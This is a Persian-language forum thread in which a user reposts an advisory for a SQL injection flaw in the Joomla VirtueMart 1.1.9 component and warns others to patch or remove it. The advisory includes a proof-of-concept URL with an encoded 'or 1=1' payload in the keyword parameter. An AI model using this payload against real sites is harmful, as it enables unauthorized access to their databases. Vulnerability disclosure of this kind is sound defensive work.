Phantom Wolf مهمان

اکسپلویت com_virtuemart جوملا

5 پست در این موضوع

باسلام.

تاریخ اکسپلویت:2012.05.04

شرح:

##################################################

# Exploit Title: joomla component (com_virtuemart) SQL injection Vulnerability

# Download: http://dev.virtuemart.net/attachments/download/287/VirtueMart_1.1.9-COMPLETE_PACKAGE.j15.zip

# Software Link: http://virtuemart.net/

# Date: 2012.05.04

# Category: webapps

# Author: ReeD

# E-mail: reed@wteam.ro

# Version: 1.1.9

##################################################

Exploiting these issue could allow an attacker to compromise the application, if i have user access.

[~]Exploit/p0c:

http://www.site.com/index.php?option=com_virtuemart&page=account.index&keyword=[sqli]

Example:

http://www.site.com/index.php?option=com_virtuemart&page=account.index&keyword=%25%2527%29+or+1%3D1%23

-------

این اکسپلویت شدیدا خطرناک است سریعا نصبت به باگ گیری (در صورت اسفاده) فرمایید

موفق و موید باشید

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

درود .

دوست عزیز امکان دارد در این مورد بیشتر توضیح دهید ؟ که چی هست ؟

چیکار میکنه ؟ روش استفاده ؟

ممنون .

Share this post


Link to post
Share on other sites

باسلام.

این درباره یکی از کامپوننت های جوملا هست که بنده این رو گذاشتم که به کاربران اطلاع دهم که هرچه سریع تر کامپوننت مورد نظر رو پاک کنند تا هک نشوند

موفق باشید:auizz3ffy9vla57584x

Share this post


Link to post
Share on other sites

درود .

یعنی کاموپونت virtuemart که در این انجمن هم منتشر شده دارای مشکل امنیتی هست ؟

خوب شما اموزش رفع مشکل را بگذارید .

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری